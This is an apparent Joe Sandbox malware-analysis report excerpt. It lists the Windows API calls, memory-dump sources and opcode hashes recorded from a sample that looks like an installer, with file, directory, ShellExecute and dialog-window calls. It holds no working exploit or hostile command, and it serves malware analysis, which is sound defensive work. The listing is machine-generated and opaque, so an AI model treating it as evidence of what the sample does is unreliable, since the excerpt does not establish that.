• GetFileAttributesW.KERNELBASE(00438800,00403055,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
• Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
• Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
• Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
APIs
• GetFileAttributesW.KERNELBASE(?,?,00405AB1,?,?,00000000,00405C87,?,?,?,?), ref: 00405EB1
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405EC5
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
• Instruction ID: 60f8d920560889598159a3dbe09e4bd556728e0d1be390bcc4c147b032138fe0
• Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
• Instruction Fuzzy Hash: 11D0C9725045306BC2102728EE0889BBF65EB682717014A35F9A5A22B0CB304C538A98
APIs
• CreateDirectoryW.KERNELBASE(?,00000000,00403482,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00405995
• GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059A3
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
• Instruction ID: b8aeb4fbbaa0c149d17919ad16f2792b2b84c079cfd5907120def0498e2ab647
• Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
• Instruction Fuzzy Hash: 6DC04CB1244501EED6105B209F08B1B7A90EB50791F1688396146E01A0DA3C8455D97E
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403444,00000000,00000000,0040329B,?,00000004,00000000,00000000,00000000), ref: 00405F68
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,00403412,000000FF,00414EC0,00000000,00414EC0,00000000,?,00000004,00000000), ref: 00405F97
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• FindCloseChangeNotification.KERNELBASE(FFFFFFFF,00403803,00000007,?,00000007,00000009,0000000B), ref: 004039DB
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
APIs
• SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040438F
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 00403455
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
                                                                                                                                                                                                                                  • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                                                  • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
• Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
APIs
• SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
• Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
• Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19
APIs
• ShellExecuteExW.SHELL32(?), ref: 00405A16
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: ExecuteShell
• String ID:
• API String ID: 587946157-0
• Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
• Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
• Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
APIs
• KiUserCallbackDispatcher.NTDLL(?,0040412A), ref: 0040435D
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
• Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
• Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D
APIs
• GetDlgItem.USER32(?,000003FB), ref: 00404871
• SetWindowTextW.USER32(00000000,?), ref: 0040489B
• SHBrowseForFolderW.SHELL32(?), ref: 0040494C
• CoTaskMemFree.OLE32(00000000), ref: 00404957
• lstrcmpiW.KERNEL32(: Completed,00423708,00000000,?,?), ref: 00404989
• lstrcatW.KERNEL32(?,: Completed), ref: 00404995
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049A7
  • Part of subcall function 00405A25: GetDlgItemTextW.USER32(?,?,00000400,004049DE), ref: 00405A38
  • Part of subcall function 0040668A: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 004066ED
  • Part of subcall function 0040668A: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 004066FC
  • Part of subcall function 0040668A: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406701
  • Part of subcall function 0040668A: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406714
• GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404A6A
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A85
  • Part of subcall function 00404BDE: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C7F
  • Part of subcall function 00404BDE: wsprintfW.USER32 ref: 00404C88
  • Part of subcall function 00404BDE: SetDlgItemTextW.USER32(?,00423708), ref: 00404C9B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                  • String ID: : Completed$A
                                                                                                                                                                                                                                  • API String ID: 2624150263-4013017881
                                                                                                                                                                                                                                  • Opcode ID: f244a7a0bf5f50bfc64a75f8fb5ad8ad31c4b097fff63674a0d64c300928d872
                                                                                                                                                                                                                                  • Instruction ID: d667353cedc46192e8d163e6c277cef07b4b15ed6202573052c67ff26174fc6d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f244a7a0bf5f50bfc64a75f8fb5ad8ad31c4b097fff63674a0d64c300928d872
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02A194B1A00209ABDB11AFA5CD45AAF77B8EF84314F10803BF611B62D1D77C99418F6D
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B16
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00425710,\*.*), ref: 00405B5E
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405B81
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B87
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B97
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C37
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405C46
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                                                  • API String ID: 2035342205-3042786806
                                                                                                                                                                                                                                  • Opcode ID: 4a9a22c29218aab3c5ab50421185d04963702c080e01836bd37a1bf3e254f337
                                                                                                                                                                                                                                  • Instruction ID: 6d977be599016ad98dbda8fdbba8a7eaa4df1add9cdfb0a4bac278b573c77b22
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a9a22c29218aab3c5ab50421185d04963702c080e01836bd37a1bf3e254f337
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A41D530904A18AAEB216B65DC8AABF7678EF41718F10413FF801B11D1D77C5AC1DEAE
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00402261
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                                                                                                                                                                                                  • API String ID: 542301482-455884830
                                                                                                                                                                                                                                  • Opcode ID: 1f6ecdd328272fbdb716ed457f1e8b08ad679cade6d4f58ae1881b77d0c7825b
                                                                                                                                                                                                                                  • Instruction ID: ffb8b13858b70c1ff9263f9ad1230fafd83ab24b06fb2866c5c71dc23dde5df7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f6ecdd328272fbdb716ed457f1e8b08ad679cade6d4f58ae1881b77d0c7825b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F411675A00209AFCF00DFE4C989A9E7BB6FF48304B2045AAF515EB2D1DB799981CB54
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: 4454f35d9bb29c406d6468a9209f8faf96a626bd34478fe6e82ff10e093cc49a
• Instruction ID: 8edab8899b0228974304dfa76bdc964f5a5729fff09c5fb89d7f9bd6055596d6
• Opcode Fuzzy Hash: 4454f35d9bb29c406d6468a9209f8faf96a626bd34478fe6e82ff10e093cc49a
• Instruction Fuzzy Hash: ADF05E71A041049AC700DFA4D9499AEB374EF10314F61457BE912F21E0D7B85E119B2A
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404DB5
• GetDlgItem.USER32(?,00000408), ref: 00404DC2
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404E0E
• LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E25
• SetWindowLongW.USER32(?,000000FC,004053B7), ref: 00404E3F
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E53
• ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E67
• SendMessageW.USER32(?,00001109,00000002), ref: 00404E7C
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E88
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E9A
• DeleteObject.GDI32(00000110), ref: 00404E9F
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404ECA
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ED6
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F71
• SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FA1
  • Part of subcall function 00404366: SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FB5
• GetWindowLongW.USER32(?,000000F0), ref: 00404FE3
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FF1
• ShowWindow.USER32(?,00000005), ref: 00405001
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00405102
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405164
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405179
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040519D
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051C0
• ImageList_Destroy.COMCTL32(?), ref: 004051D5
• GlobalFree.KERNEL32(?), ref: 004051E5
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040525E
• SendMessageW.USER32(?,00001102,?,?), ref: 00405307
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405316
• InvalidateRect.USER32(?,00000000,00000001), ref: 00405340
• ShowWindow.USER32(?,00000000), ref: 0040538E
• GetDlgItem.USER32(?,000003FE), ref: 00405399
• ShowWindow.USER32(00000000), ref: 004053A0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 2564846305-813528018
• Opcode ID: e65f9a1c394212a9998e8446e7bde38381c40a8c32278b0b704a2027b11c527a
• Instruction ID: f13cb60032faeb06b1ff68bd0c1dc2f430bb97b794b1e627908efdb4cc4bd96d
• Opcode Fuzzy Hash: e65f9a1c394212a9998e8446e7bde38381c40a8c32278b0b704a2027b11c527a
• Instruction Fuzzy Hash: 04127DB0900609EFDF209F95CD45AAE7BB5FB84314F10817AFA10BA2E1D7798951CF58
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040458E
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004045A2
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045BF
                                                                                                                                                                                                                                  • GetSysColor.USER32(?), ref: 004045D0
